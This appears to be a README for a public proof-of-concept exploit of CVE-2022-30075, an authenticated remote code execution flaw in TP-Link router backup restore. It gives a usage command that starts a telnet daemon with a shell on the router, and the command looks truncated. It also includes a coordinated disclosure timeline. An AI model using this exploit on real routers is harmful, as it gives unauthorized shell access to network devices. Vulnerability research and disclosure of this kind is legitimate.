CVE-2022-30075 Tp-Link Authenticated RCE



Authenticated Remote Code Execution in Tp-Link Routers

Affected Devices

If your Tp-Link router has backup and restore functionality and firmware is older than june 2022, it is probably vulnerable

Tested With

Tp-Link Archer AX50, other tplink routers may use different format of backups and exploit needs to be modified

How to Use

git clone
cd CVE-2022-30075
python3 -t -p 8080 -c "/usr/bin/telnetd -l /bin/"


Using exploit for starting telnet daemon on the router



15.03.2022 – Identified vulnerability
15.03.2022 – Contacted Tp-Link support
16.03.2022 – Recieved response from Tp-Link
02.05.2022 – Assigned CVE
27.05.2022 – Tp-Link released firmware with fixed vulnerability
07.06.2022 – Published technical details

The CVE-2022-30075 is a github repository by Tomas Melicher